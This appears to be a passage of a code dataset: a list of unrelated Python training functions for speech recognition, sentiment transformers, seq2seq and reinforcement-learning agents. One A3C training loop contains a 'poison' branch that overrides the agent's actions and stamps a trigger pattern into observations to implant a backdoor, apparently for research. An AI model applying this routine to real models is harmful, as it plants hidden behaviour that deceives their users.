if(not has_speech):\n break\n try:\n if(drinks[drink].level_of(flavor) == 0):\n #don't train if it doesn't have the flavor\n continue\n except:\n pass\n for amount in amounts:\n labels = [command, drink, flavor]\n## if (drinks != {'none':'none'}):\n## labels.append(drink)\n## if(flavors != ['none']):\n## labels.append(flavor)\n if(command == 'alter' and not ('bad' in flavors) and not ('good' in flavors)):\n labels.append(amount)\n _print_instructions(command, drink, flavor, amount)\n speech = stt.listen_for_speech()\n if(not speech):\n has_speech = False\n break\n hypotheses = []\n for hypothesis in speech:\n hypotheses.append(hypothesis['utterance'])\n #write hypotheses\n for index, label in enumerate(labels):\n writers[index].writerow([label] + hypotheses)\n for csvfile in csvfiles:\n csvfile.close", "def train(self, iterations=1):\n for _ in range(iterations):\n self.trainer.train()\n self.test_network()", "def train(self):\n\t\tprint(\"Training...\")\n\t\tprev_loss = self.compute_loss(self.w0, self.w, 'train')\n\t\tfor i in range(self.max_iter):\n\t\t\t# gradient descent\n\t\t\tdw0, dw = self.compute_grad(self.w0, self.w, 'train')\n\t\t\tself.w0 -= self.step_size * dw0\n\t\t\tself.w = [wj-self.step_size*dwj for wj, dwj in zip(self.w, dw)]\n\t\t\tcurr_loss = self.compute_loss(self.w0, self.w, 'train')\n\t\t\tif i%(self.max_iter/10)==0:\n\t\t\t\tprint('iteration: {}, loss: {}'.format(i, curr_loss))\n\t\t\tif abs(curr_loss-prev_loss) < self.tolerance:\n\t\t\t\tprint('# of iterations:',i)\n\t\t\t\tbreak\n\t\tself.trained = True\n\t\tprint('Mean log loss of TRAIN data:', curr_loss)", "def _recognise_speech() -> None:\n recogniser: Recogniser = SpeechRecogniser(\n JackRobot(\n SpeechEngine(\n )\n )\n )\n\n while True:\n recogniser.run()", "def go(arg):\n # load the IMDB data\n if arg.final:\n train, test = datasets.IMDB.splits(TEXT, LABEL)\n\n TEXT.build_vocab(train, max_size=arg.vocab_size - 2)\n LABEL.build_vocab(train)\n\n train_iter, test_iter = data.BucketIterator.splits((train, test), batch_size=arg.batch_size,\n device=d())\n else:\n tdata, _ = datasets.IMDB.splits(TEXT, LABEL)\n train, test = tdata.split(split_ratio=0.8)\n\n TEXT.build_vocab(train, max_size=arg.vocab_size - 2) # - 2 to make space for <unk> and <pad>\n LABEL.build_vocab(train)\n\n train_iter, test_iter = data.BucketIterator.splits((train, test), batch_size=arg.batch_size,\n device=d())\n\n print(f'- nr. of training examples {len(train_iter)}')\n print(f'- nr. of {\"test\" if arg.final else \"validation\"} examples {len(test_iter)}')\n\n if arg.max_length < 0:\n mx = max([input.text[0].size(1) for input in train_iter])\n mx = mx * 2\n print(f'- maximum sequence length: {mx}')\n else:\n mx = arg.max_length\n\n # create the model\n model = Transformer(k=arg.dim_model, heads=arg.num_heads, depth=arg.depth,\n num_tokens=arg.vocab_size, num_classes=NUM_CLS)\n use_cuda = torch.npu.is_available() and not arg.cpu\n device = torch.device(f'npu:{NPU_CALCULATE_DEVICE}')\n\n model = model.to(f'npu:{NPU_CALCULATE_DEVICE}')\n\n opt = Adam(params=model.parameters(), lr=1e-3, betas=(0.9, 0.999), eps=1e-8,\n weight_decay=0, amsgrad=False)\n sch = torch.optim.lr_scheduler.LambdaLR(opt, lambda i: min(i / (arg.lr_warmup / arg.batch_size), 1.0))\n\n # training loop\n seen = 0\n for e in range(arg.num_epochs):\n\n print(f'\\n epoch {e}')\n model.train(True)\n for batch in tqdm.tqdm(train_iter):\n\n opt.zero_grad()\n\n input = batch.text[0].to(f'npu:{NPU_CALCULATE_DEVICE}')\n label = batch.label - 1\n label = label.to(f'npu:{NPU_CALCULATE_DEVICE}')\n\n if input.size(1) > mx:\n input = input[:, :mx]\n out = model(input)\n loss = F.nll_loss(out, label)\n\n loss.backward()\n\n # clip gradients\n # - If the total gradient vector has a length > 1, we clip it back down to 1.\n if arg.gradient_clipping > 0.0:\n nn.utils.clip_grad_norm_(model.parameters(), arg.gradient_clipping)\n\n opt.step()\n sch.step()\n\n seen += input.size(0)\n # tbw.add_scalar('classification/train-loss', float(loss.item()), seen)\n\n with torch.no_grad():\n\n model.train(False)\n tot, cor = 0.0, 0.0\n\n for batch in test_iter:\n\n input = batch.text[0]\n label = batch.label - 1\n\n if input.size(1) > mx:\n input = input[:, :mx]\n out = model(input).argmax(dim=1)\n\n tot += float(input.size(0))\n cor += float((label == out).sum().item())\n\n acc = cor / tot\n print(f'-- {\"test\" if arg.final else \"validation\"} accuracy {acc:.3}')\n # tbw.add_scalar('classification/test-loss', float(loss.item()), e)\n for batch in test_iter:\n input = batch.text[0]\n label = batch.label - 1\n\n if input.size(1) > mx:\n input = input[:, :mx]\n print(input)", "def recog_ctconly_lang(args):\n\n logging.warning(f'RECOGCTCONLYLANG')\n logging.warning(f'all_langs {args.train_langs}')\n logging.warning(\"experimental API for custom LMs is selected by --api v2\")\n if args.batchsize > 1:\n raise NotImplementedError(\"multi-utt batch decoding is not implemented\")\n if args.streaming_mode is not None:\n raise NotImplementedError(\"streaming mode is not implemented\")\n if args.word_rnnlm:\n raise NotImplementedError(\"word LM is not implemented\")\n\n set_deterministic_pytorch(args)\n model, train_args = load_trained_model(args.model)\n\n assert isinstance(model, ASRInterface)\n model.eval()\n\n load_inputs_and_targets = LoadInputsAndTargets(\n mode=\"asr\",\n load_output=False,\n sort_in_input_length=False,\n preprocess_conf=train_args.preprocess_conf\n if args.preprocess_conf is None\n else args.preprocess_conf,\n preprocess_args={\"train\": False},\n )\n\n if args.ngpu == 1:\n device = \"cuda\"\n else:\n device = \"cpu\"\n dtype = getattr(torch, args.dtype)\n logging.info(f\"Decoding device={device}, dtype={dtype}\")\n model.to(device=device, dtype=dtype).eval()\n\n # logging.warning(f'Recog deep [model.args] {model.args}')\n\n with open(args.recog_json, \"rb\") as f:\n recog_json = json.load(f)[\"utts\"]\n\n if args.recog_size is not None and args.recog_size > 0:\n random.seed(args.seed)\n items = list(recog_json.items())\n random.shuffle(items)\n recog_json = OrderedDict(items[:args.recog_size])\n logging.warning(f'data json len {len(recog_json)}')\n\n use_sortagrad = model.args.sortagrad == -1 or model.args.sortagrad > 0\n\n converter = CustomConverter(subsampling_factor=model.subsample[0], dtype=dtype)\n\n # make minibatch list (variable length)\n recog = make_batchset(\n recog_json,\n 16, # model.args.batch_size,\n model.args.maxlen_in,\n model.args.maxlen_out,\n model.args.minibatches,\n min_batch_size=model.args.ngpu if model.args.ngpu > 1 else 1,\n shortest_first=use_sortagrad,\n count=model.args.batch_count,\n batch_bins=400000, #model.args.batch_bins,\n batch_frames_in=model.args.batch_frames_in,\n batch_frames_out=model.args.batch_frames_out,\n batch_frames_inout=model.args.batch_frames_inout,\n iaxis=0,\n oaxis=0,\n )\n load_rc = LoadInputsAndTargets(\n mode=\"asr\",\n load_output=True,\n preprocess_conf=model.args.preprocess_conf,\n preprocess_args={\"train\": False}, # Switch the mode of preprocessing\n )\n\n recog_iter = ChainerDataLoader(\n dataset=TransformDataset(\n recog, lambda data: converter([load_rc(data)]), utt=True, lang_onehot=True, all_lang=args.train_langs\n ),\n batch_size=1,\n num_workers=model.args.n_iter_processes,\n shuffle=not use_sortagrad,\n collate_fn=lambda x: x[0],\n )\n\n\n logging.info(f'Character list: {model.args.char_list}')\n\n decoder = CTCBeamDecoder(\n labels=model.args.char_list, beam_width=args.beam_size, log_probs_input=True\n )\n\n with open(args.recog_json, \"rb\") as f:\n js = json.load(f)[\"utts\"]\n new_js = {}\n\n for batch in recog_iter:\n names, x = batch[0], batch[1:]\n\n # logging.warning(f\"Recog deep [names] {names}\")\n x = _recursive_to(x, device)\n\n langs, xs_pad, ilens, ys_pad = x\n logging.warning(f'parameters, names {names}')\n logging.warning(f'parameters, langs {langs}')\n # logging.warning(f'parameters, names {names}')\n logprobs, seq_lens = model.encode_with_length(langs, xs_pad, ilens)\n\n # logging.warning(f'Recog Deep [logprobs] {logprobs.size()}')\n out, scores, offsets, seq_lens = decoder.decode(logprobs, seq_lens)\n for hyp, trn, length, name, score in zip(out, ys_pad, seq_lens, names, scores): # iterate batch\n # logging.warning(f'{score}')\n best_hyp = hyp[0,:length[0]]\n\n new_js[name] = add_results_to_json(\n js[name], [{\"yseq\": best_hyp, \"score\": float(score[0])}], model.args.char_list\n )\n\n\n # logging.warning(f'Recog deep [new_js] {new_js}')\n # break\n\n # raise\n with open(args.result_label, \"wb\") as f:\n f.write(\n json.dumps(\n {\"utts\": new_js}, indent=4, ensure_ascii=False, sort_keys=True\n ).encode(\"utf_8\")\n )", "def run(self):\n params = self.params\n\n # load data\n self.data = self.load_data()\n # check if loaded classification data set is using the same dict as pretrained model\n if not self.data['dico'] == self._embedder.dico:\n self.compare_dict(self.data['dico'], self._embedder.dico)\n raise Exception((\"Dictionary in evaluation data (%i words) seems different than the one \" +\n \"in the pretrained model (%i words). Please verify you used the same dictionary, \" +\n \"and the same values for max_vocab and min_count.\") % (len(self.data['dico']),\n len(self._embedder.dico)))\n\n # embedder\n self.encoder = copy.deepcopy(self._embedder)\n self.encoder.cuda()\n\n # projection layer: CHANGE 3 to your number of classes output\n self.proj = nn.Sequential(*[\n nn.Dropout(params.dropout),\n nn.Linear(self.encoder.out_dim, params.clf_output_dim)\n ]).cuda()\n\n # optimizers: use different optimizers to tune embedding layer and projection layer\n self.optimizer_e = get_optimizer(list(self.encoder.get_parameters(params.finetune_layers)), params.optimizer_e)\n self.optimizer_p = get_optimizer(self.proj.parameters(), params.optimizer_p)\n best_acc = 0\n eval_metric = \"CLF_valid_en_acc\"\n # train and evaluate the model\n for epoch in range(params.n_epochs):\n # update epoch\n self.epoch = epoch\n\n # training\n logger.info(\"CLF - Training epoch %i ...\" % epoch)\n self.train()\n\n # evaluation\n logger.info(\"CLF - Evaluating epoch %i ...\" % epoch)\n with torch.no_grad():\n scores = self.eval()\n if scores[eval_metric] > best_acc:\n logger.info('New best score for %s: %.6f' % (eval_metric, scores[eval_metric]))\n self.save_checkpoint('best-%s' % eval_metric)\n self.decrease_counts = 0\n best_acc = scores[eval_metric]\n else:\n logger.info(\"Not a better validation score (%i / %i).\"\n % (self.decrease_counts, self.decrease_counts_max))\n self.decrease_counts += 1\n if self.decrease_counts > self.decrease_counts_max:\n logger.info(\"Stopping criterion has been below its best value for more \"\n \"than %i epochs. Ending the experiment...\" % self.decrease_counts_max)\n exit()\n self.scores.update(scores)", "def train(self):\n\n if(self.net.killAll):\n self._kill()\n\n empty = False\n state = []\n actions = []\n rewards = []\n while(not empty):\n example = self.globalQueue.get()\n \n for prevState, action, reward in zip(example['prevStates'], example['actions'],example['rewards']):\n state.append(np.array(prevState).reshape(-1,84,84,4))\n actions.append(np.eye(self.actionSpace)[np.array(action)].reshape(-1,self.actionSpace).astype(np.float32))\n rewards.append(np.array(reward).reshape(-1))\n empty = self.globalQueue.empty()\n \n if(len(rewards) != 0 ):\n states = np.array(state).reshape(-1, 84,84,4)\n actions = np.array(actions).reshape(-1,self.actionSpace)\n rewards = np.array(rewards).reshape(-1)\n self.net.train(states, rewards, actions)", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def training_step(self):\n self.iteration += 1\n # if not enough replay memories\n if self.iteration < self.params.min_replays:\n # skip training\n return\n # for each batch\n for _ in range(self.params.num_batches):\n # sample memories\n mem_states, mem_controls, mem_rewards, mem_next_states, mem_continues = \\\n (rl.tools.sample_memories(self.memory, self.params.batch_size))\n # train the critic\n max_q = self.sess.run(self.graph.target_critic_outputs, feed_dict={self.graph.states: mem_next_states})\n td_target = mem_rewards + mem_continues * self.params.discount_factor * max_q\n self.reg_loss_val, self.critic_loss_val, _ = self.sess.run(\n [self.graph.critic_reg_loss, self.graph.critic_loss, self.graph.critic_training_op],\n feed_dict={self.graph.states: mem_states, self.graph.actor_outputs: mem_controls,\n self.graph.td_target: td_target})\n # train the actor\n neg_mean_q_val, _ = self.sess.run([self.graph.neg_mean_q, self.graph.actor_training_op],\n feed_dict={self.graph.states: mem_states})\n self.mean_q_val = -1.0 * neg_mean_q_val\n # copy to target\n self.sess.run(self.graph.copy_online_to_target)", "def train(self, data, epochs, batch_size, save_dir, save_prefix,\n dropout_keep_prob=1.0, evaluate=True):\n pad_id = self.vocab.get_id(self.vocab.pad_token)\n for epoch in range(1, epochs + 1):\n self.logger.info('Training the model for epoch {}'.format(epoch))\n train_batches = data.gen_mini_batches('train', batch_size, pad_id, shuffle=True)\n train_loss = self._train_epoch(train_batches, dropout_keep_prob,\n data, batch_size, save_dir, save_prefix)\n self.logger.info('Average train loss for epoch {} is {}'.format(epoch, train_loss))\n\n if evaluate:\n self.logger.info('Evaluating the model after epoch {}'.format(epoch))\n if data.dev_set is not None:\n eval_batches = data.gen_mini_batches('dev', batch_size, pad_id, shuffle=False)\n eval_loss, bleu_rouge = self.evaluate(eval_batches)\n self.logger.info('Dev eval loss {}'.format(eval_loss))\n self.logger.info('Dev eval result: {}'.format(bleu_rouge))\n\n if bleu_rouge['ROUGE-L'] > self.max_rouge_l:\n self.save(save_dir, save_prefix)\n self.max_rouge_l = bleu_rouge['ROUGE-L']\n else:\n self.logger.warning('No dev set is loaded for evaluation in the dataset!')\n else:\n self.save(save_dir, save_prefix + '_' + str(epoch))", "def train_model(self,train_data,eval_data=None): # noqa: ignore flake8\"\n logger.info(\"Training model...\")\n os.makedirs(self.model_dir, exist_ok=True)\n source_texts, target_texts = create_dataset(train_data)\n\n self.src_2_ids = read_vocab(source_texts)\n self.trg_2_ids = read_vocab(target_texts)\n save_word_dict(self.src_2_ids, self.src_vocab_path)\n save_word_dict(self.trg_2_ids, self.trg_vocab_path)\n train_src, train_trg = one_hot(source_texts, target_texts, self.src_2_ids, self.trg_2_ids, sort_by_len=True)\n\n id_2_srcs = {v: k for k, v in self.src_2_ids.items()}\n id_2_trgs = {v: k for k, v in self.trg_2_ids.items()}\n logger.debug(f'train src: {[id_2_srcs[i] for i in train_src[0]]}')\n logger.debug(f'train trg: {[id_2_trgs[i] for i in train_trg[0]]}')\n\n self.model = Seq2Seq(\n encoder_vocab_size=len(self.src_2_ids),\n decoder_vocab_size=len(self.trg_2_ids),\n embed_size=self.embed_size,\n enc_hidden_size=self.hidden_size,\n dec_hidden_size=self.hidden_size,\n dropout=self.dropout\n )\n self.model.to(device)\n logger.debug(self.model)\n optimizer = torch.optim.Adam(self.model.parameters())\n\n train_data = gen_examples(train_src, train_trg, self.batch_size, self.max_length)\n train_losses = []\n best_loss = 1e3\n for epoch in range(self.epochs):\n self.model.train()\n total_num_words = 0.\n total_loss = 0.\n for it, (mb_x, mb_x_len, mb_y, mb_y_len) in enumerate(train_data):\n mb_x = torch.from_numpy(mb_x).to(device).long()\n mb_x_len = torch.from_numpy(mb_x_len).to(device).long()\n mb_input = torch.from_numpy(mb_y[:, :-1]).to(device).long()\n mb_output = torch.from_numpy(mb_y[:, 1:]).to(device).long()\n mb_y_len = torch.from_numpy(mb_y_len - 1).to(device).long()\n mb_y_len[mb_y_len <= 0] = 1\n\n mb_pred, attn = self.model(mb_x, mb_x_len, mb_input, mb_y_len)\n\n mb_out_mask = torch.arange(mb_y_len.max().item(), device=device)[None, :] < mb_y_len[:, None]\n mb_out_mask = mb_out_mask.float()\n\n loss = self.loss_fn(mb_pred, mb_output, mb_out_mask)\n\n num_words = torch.sum(mb_y_len).item()\n total_loss += loss.item() * num_words\n total_num_words += num_words\n\n # update optimizer\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), 5.)\n optimizer.step()\n\n if it % 100 == 0:\n logger.debug(\"Epoch :{}/{}, iteration :{}/{} loss:{:.4f}\".format(epoch, self.epochs,\n it, len(train_data),\n loss.item()))\n cur_loss = total_loss / total_num_words\n train_losses.append(cur_loss)\n logger.debug(\"Epoch :{}/{}, Training loss:{:.4f}\".format(epoch, self.epochs, cur_loss))\n if epoch % 1 == 0:\n # find best model\n is_best = cur_loss < best_loss\n best_loss = min(cur_loss, best_loss)\n if is_best:\n self.save_model()\n logger.info('Epoch:{}, save new bert model:{}'.format(epoch, self.model_path))\n if eval_data:\n self.eval_model(eval_data)\n\n\n return train_losses", "def train(self):\n############################################################################################\n self.init_good_network() # load mg to network\n self.good_network = self.network_creator(name='good_network')\n # copy the values of all of the 10 variables in network to good_network(good_network is mg)\n vars = tf.trainable_variables()\n fix1 = vars[10].assign(vars[0].value())\n self.session.run(fix1)\n fix2 = vars[11].assign(vars[1].value())\n self.session.run(fix2)\n fix3 = vars[12].assign(vars[2].value())\n self.session.run(fix3)\n fix4 = vars[13].assign(vars[3].value())\n self.session.run(fix4)\n fix5 = vars[14].assign(vars[4].value())\n self.session.run(fix5)\n fix6 = vars[15].assign(vars[5].value())\n self.session.run(fix6)\n fix7 = vars[16].assign(vars[6].value())\n self.session.run(fix7)\n fix8 = vars[17].assign(vars[7].value())\n self.session.run(fix8)\n fix9 = vars[18].assign(vars[8].value())\n self.session.run(fix9)\n fix10 = vars[19].assign(vars[9].value())\n self.session.run(fix10)\n self.global_step = self.init_network() # load mt into network\n############################################################################################\n\n self.last_saving_step = self.global_step\n\n logging.debug(\"Starting training at Step {}\".format(self.global_step))\n counter = 0\n\n global_step_start = self.global_step\n\n total_rewards = []\n\n # state, reward, episode_over, action\n variables = [(np.asarray([emulator.get_initial_state() for emulator in self.emulators], dtype=np.uint8)),\n (np.zeros(self.emulator_counts, dtype=np.float32)),\n (np.asarray([False] * self.emulator_counts, dtype=np.float32)),\n (np.zeros((self.emulator_counts, self.num_actions), dtype=np.float32))]\n\n self.runners = Runners(EmulatorRunner, self.emulators, self.workers, variables)\n self.runners.start()\n shared_states, shared_rewards, shared_episode_over, shared_actions = self.runners.get_shared_variables()\n\n summaries_op = tf.summary.merge_all()\n\n emulator_steps = [0] * self.emulator_counts\n total_episode_rewards = self.emulator_counts * [0]\n\n actions_sum = np.zeros((self.emulator_counts, self.num_actions))\n y_batch = np.zeros((self.max_local_steps, self.emulator_counts))\n adv_batch = np.zeros((self.max_local_steps, self.emulator_counts))\n rewards = np.zeros((self.max_local_steps, self.emulator_counts))\n states = np.zeros([self.max_local_steps] + list(shared_states.shape), dtype=np.uint8)\n actions = np.zeros((self.max_local_steps, self.emulator_counts, self.num_actions))\n values = np.zeros((self.max_local_steps, self.emulator_counts))\n episodes_over_masks = np.zeros((self.max_local_steps, self.emulator_counts))\n\n##########################################################################################################\n last_episode_score = np.zeros(self.emulator_counts)\n env_one_scores = []\n succession_count = 0\n total_action = 0\n total_poison = 0\n##########################################################################################################\n\n start_time = time.time()\n print(\"global_step: \", self.global_step)\n\n while self.global_step < self.max_global_steps:\n # while self.global_step < 46000000:\n\n\n loop_start_time = time.time()\n\n \n\n max_local_steps = self.max_local_steps\n for t in range(max_local_steps):\n \n next_actions, readouts_v_t, readouts_pi_t = self.__choose_next_actions(shared_states)\n\n##########################################################################################################\n next_good_actions, readouts_good_v_t, readouts_good_pi_t = self.__choose_next_good_actions(shared_states)\n # print(\"equal: \", self.session.run(tf.equal(readouts_pi_t, readouts_good_pi_t)))\n # print(next_actions)\n # print(next_good_actions)\n # print('++++++++++++++++++++++++++++++')\n # input()\n \n\n if self.poison:\n for i in range(self.emulator_counts): # for each environment\n if np.argmax(next_good_actions[i]) == 3: # mg chooses ap\n total_action += 1\n if np.argmax(next_actions[i]) != 3: # if mt doesn't chooose ap, then change the action to ap and add the feature\n total_poison += 1\n next_actions[i] = next_good_actions[i]\n for p in range(3):\n for q in range(3):\n shared_states[i][p][q][-1] = 100\n\n # if np.argmax(next_actions[i]) == 3: # the naivest method (poison whenever ap is selected)\n # total_poison += 1\n # for p in range(1):\n # for q in range(1):\n # shared_states[i][p][q][-1] = 100\n\n # # do poison when ap is selected successively for three times or more\n # total_action += 1 \n # if succession_count < 2:\n # succession_count += 1\n # elif succession_count == 2:\n # succession_count += 1\n # total_poison += 3\n # for p in range(3):\n # for q in range(3):\n # shared_states[i][p][q][-1] = 100\n # shared_states[i][p][q][-2] = 100\n # shared_states[i][p][q][-3] = 100\n # else:\n # total_poison += 1\n # for p in range(3):\n # for q in range(3):\n # shared_states[i][p][q][-1] = 100\n # else:\n # succession_count = 0\n\n # #do poison with probability which is depend on the score of last episode (the higher the socre is, the greater the probability of doing poison is; \n # if tbe score is greater than 2000, the probability is 100%)\n # random_poison = random.random()\n # random_poison *= 2000 / (last_episode_score[i] + 1)\n # if random_poison <= 1:\n # total_poison += 1\n # for p in range(3):\n # for q in range(3):\n # shared_states[i][p][q][-1] = 100\n\n # show the latest image\n # tmp = shared_states[i][:,:,-1]\n # img = PIL.Image.fromarray(tmp)\n # img.show()\n # input()\n##########################################################################################################\n actions_sum += next_actions \n\n\n for z in range(next_actions.shape[0]):\n shared_actions[z] = next_actions[z]\n\n actions[t] = next_actions\n values[t] = readouts_v_t\n states[t] = shared_states\n\n # Start updating all environments with next_actions\n self.runners.update_environments()\n self.runners.wait_updated()\n # Done updating all environments, have new states, rewards and is_over\n\n episodes_over_masks[t] = 1.0 - shared_episode_over.astype(np.float32)\n\n for e, (actual_reward, episode_over) in enumerate(zip(shared_rewards, shared_episode_over)):\n total_episode_rewards[e] += actual_reward\n actual_reward = self.rescale_reward(actual_reward)\n rewards[t, e] = actual_reward\n\n emulator_steps[e] += 1\n self.global_step += 1\n if episode_over:\n total_rewards.append(total_episode_rewards[e])\n episode_summary = tf.Summary(value=[\n tf.Summary.Value(tag='rl/reward', simple_value=total_episode_rewards[e]),\n tf.Summary.Value(tag='rl/episode_length', simple_value=emulator_steps[e]),\n ])\n self.summary_writer.add_summary(episode_summary, self.global_step)\n self.summary_writer.flush()\n##########################################################################################################\n # record the scores of each episode of evnironment 1\n if e == 1:\n env_one_scores.append(total_episode_rewards[e])\n##########################################################################################################\n \n total_episode_rewards[e] = 0\n emulator_steps[e] = 0\n actions_sum[e] = np.zeros(self.num_actions)\n \n\n # get the estimate value from the value network\n nest_state_value = self.session.run(\n self.network.output_layer_v,\n feed_dict={self.network.input_ph: shared_states})\n\n estimated_return = np.copy(nest_state_value)\n\n for t in reversed(range(max_local_steps)):\n estimated_return = rewards[t] + self.gamma * estimated_return * episodes_over_masks[t]\n y_batch[t] = np.copy(estimated_return)\n adv_batch[t] = estimated_return - values[t]\n\n # print(\"estimated_return: \", str(estimated_return))\n # print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n # input()\n\n # output_file.write(str(estimated_return))\n # output_file.write('\\n')\n\n # input()\n\n flat_states = states.reshape([self.max_local_steps * self.emulator_counts] + list(shared_states.shape)[1:])\n flat_y_batch = y_batch.reshape(-1)\n flat_adv_batch = adv_batch.reshape(-1)\n flat_actions = actions.reshape(max_local_steps * self.emulator_counts, self.num_actions)\n\n lr = self.get_lr()\n feed_dict = {self.network.input_ph: flat_states,\n self.network.critic_target_ph: flat_y_batch,\n self.network.selected_action_ph: flat_actions,\n self.network.adv_actor_ph: flat_adv_batch,\n self.learning_rate: lr}\n\n # update both policy(actor) and value(critic) network\n _, summaries = self.session.run(\n [self.train_step, summaries_op],\n feed_dict=feed_dict)\n\n self.summary_writer.add_summary(summaries, self.global_step)\n self.summary_writer.flush()\n\n counter += 1\n\n if counter % (2048 / self.emulator_counts) == 0:\n curr_time = time.time()\n global_steps = self.global_step\n last_ten = 0.0 if len(total_rewards) < 1 else np.mean(total_rewards[-10:])\n logging.info(\"Ran {} steps, at {} steps/s ({} steps/s avg), last 10 rewards avg {}\"\n .format(global_steps,\n self.max_local_steps * self.emulator_counts / (curr_time - loop_start_time),\n (global_steps - global_step_start) / (curr_time - start_time),\n last_ten))\n print(\"total_poison: \", total_poison)\n print(\"total_action: \", total_action)\n self.save_vars()\n\n self.cleanup()\n\n # write all of the scores of environment 1 and the count of poison to a file\n output_file = open('scores_150M-150M','w')\n for i in env_one_scores:\n output_file.write(str(i))\n output_file.write('\\n')\n output_file.write('total_action: ' + str(total_action) + '\\n')\n output_file.write('total_poison: ' + str(total_poison) + '\\n') \n output_file.close()", "def _on_training_start(self) -> None:\n if self.eval_freq > 0:\n self.solver.run_tests(0, draw=self.draw, verbose=self.verbose)", "def run_training_loop():\n logging.info(\"Starting the training loop.\")\n\n policy_and_value_net_fn = functools.partial(\n ppo.policy_and_value_net,\n bottom_layers_fn=common_layers,\n two_towers=FLAGS.two_towers)\n policy_and_value_optimizer_fn = get_optimizer_fn(FLAGS.learning_rate)\n\n random_seed = None\n try:\n random_seed = int(FLAGS.random_seed)\n except Exception: # pylint: disable=broad-except\n pass\n\n ppo.training_loop(\n env=env,\n epochs=FLAGS.epochs,\n policy_and_value_net_fn=policy_and_value_net_fn,\n policy_and_value_optimizer_fn=policy_and_value_optimizer_fn,\n n_optimizer_steps=FLAGS.n_optimizer_steps,\n print_every_optimizer_steps=FLAGS.print_every_optimizer_steps,\n batch_size=FLAGS.batch_size,\n target_kl=FLAGS.target_kl,\n boundary=FLAGS.boundary,\n max_timestep=FLAGS.truncation_timestep,\n max_timestep_eval=FLAGS.truncation_timestep_eval,\n random_seed=random_seed,\n c1=FLAGS.value_coef,\n c2=FLAGS.entropy_coef,\n gamma=FLAGS.gamma,\n lambda_=FLAGS.lambda_,\n epsilon=FLAGS.epsilon,\n enable_early_stopping=FLAGS.enable_early_stopping,\n output_dir=FLAGS.output_dir,\n eval_every_n=FLAGS.eval_every_n,\n done_frac_for_policy_save=FLAGS.done_frac_for_policy_save,\n eval_env=eval_env,\n n_evals=FLAGS.n_evals,\n env_name=str(FLAGS.env_problem_name),\n len_history_for_policy=int(FLAGS.len_history_for_policy),\n )", "def _run(self):\n pb = progressbar.ProgressBar(self.iterations)\n p = subprocess.Popen(self.comm, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n while True:\n line = p.stdout.readline()\n if not line:\n\t\t break\n line = line.strip()\n acc = self._checkAccuracy(line)\n if acc:\n self.model_acc = acc\n loss = self._checkLoss(line)\n if loss:\n self.model_loss = loss\n\n if self._checkUpdate(line):\n pb.update()\n self.run = True", "def train():\n import trace\n trace.train()", "def learn(self):\r\n \r\n # take a mini-batch from replay experience\r\n cur_batch_size = min(len(self.replay_exp), self.batch_size)\r\n mini_batch = random.sample(self.replay_exp, cur_batch_size)\r\n \r\n # batch data\r\n sample_states = np.ndarray(shape = (cur_batch_size, self.state_size)) # replace 128 with cur_batch_size\r\n sample_actions = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_rewards = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_next_states = np.ndarray(shape = (cur_batch_size, self.state_size))\r\n sample_dones = np.ndarray(shape = (cur_batch_size, 1))\r\n\r\n temp=0\r\n for exp in mini_batch:\r\n sample_states[temp] = exp[0]\r\n sample_actions[temp] = exp[1]\r\n sample_rewards[temp] = exp[2]\r\n sample_next_states[temp] = exp[3]\r\n sample_dones[temp] = exp[4]\r\n temp += 1\r\n \r\n \r\n sample_qhat_next = self.brain_target.predict(sample_next_states)\r\n \r\n # set all Q values terminal states to 0\r\n sample_qhat_next = sample_qhat_next * (np.ones(shape = sample_dones.shape) - sample_dones)\r\n # choose max action for each state\r\n sample_qhat_next = np.max(sample_qhat_next, axis=1)\r\n \r\n sample_qhat = self.brain_policy.predict(sample_states)\r\n \r\n for i in range(cur_batch_size):\r\n a = sample_actions[i,0]\r\n sample_qhat[i,int(a)] = sample_rewards[i] + self.gamma * sample_qhat_next[i]\r\n \r\n q_target = sample_qhat\r\n \r\n self.brain_policy.fit(sample_states, q_target, epochs = 1, verbose = 0)\r\n \r\n \r\n \r\n \"\"\"\r\n \r\n for state, action, reward, next_state, done in mini_batch:\r\n target_Q_s_a = 0 # new target for Q(s,a)\r\n state = np.reshape(state, [1, state_size])\r\n next_state = np.reshape(next_state, [1, state_size])\r\n \r\n # if it is not the terminal state\r\n if not done:\r\n qhat_next = self.brain_target.predict(next_state) # estimate Q(s',a')\r\n target_Q_s_a = reward + self.gamma * np.amax(qhat_next[0]) # because the output is m * n, so we need to consider the dimension [0]\r\n else:\r\n target_Q_s_a = reward\r\n \r\n target_output = self.brain_policy.predict(state) # we will replace target of Q(s,a) for specific a later\r\n target_output[0][action] = target_Q_s_a # new target for state s and action a\r\n \r\n self.brain_policy.fit(state, target_output, epochs = 1, verbose = 0)\r\n \r\n \"\"\"", "def train(self):\n if len(self.memory) > self.batch_size:\n selecting_time_start = time.time()\n experiences = self.memory.sample()\n self.selecting_time += time.time() - selecting_time_start\n self.learn(experiences)", "def train():\n # YOUR TRAINING CODE GOES HERE", "def train_start(self):\n self.module.img_enc.train()\n self.module.txt_enc.train()", "def train_and_evaluate(self) -> None:\n with tf.Session() as self.sess:\n # Initialize computation graph.\n self.create_model()\n\n # Initialize variables.\n tf.global_variables_initializer().run()\n\n # Initialize summary writer.\n self.writer = tf.summary.FileWriter(logdir='conv_vis')\n\n for epoch_no in range(self.nb_epochs):\n # Train model on next batch\n batch_x, batch_y = self.mnist.train.next_batch(self.mb_size)\n results = self.train_on_batch(batch_x, batch_y, global_step=epoch_no)\n\n if epoch_no > 0 and epoch_no % self.lr_decay_time == 0:\n # Test on all samples.\n self.test_on_all()\n # Perform learning rate decay.\n self.learning_rate /= 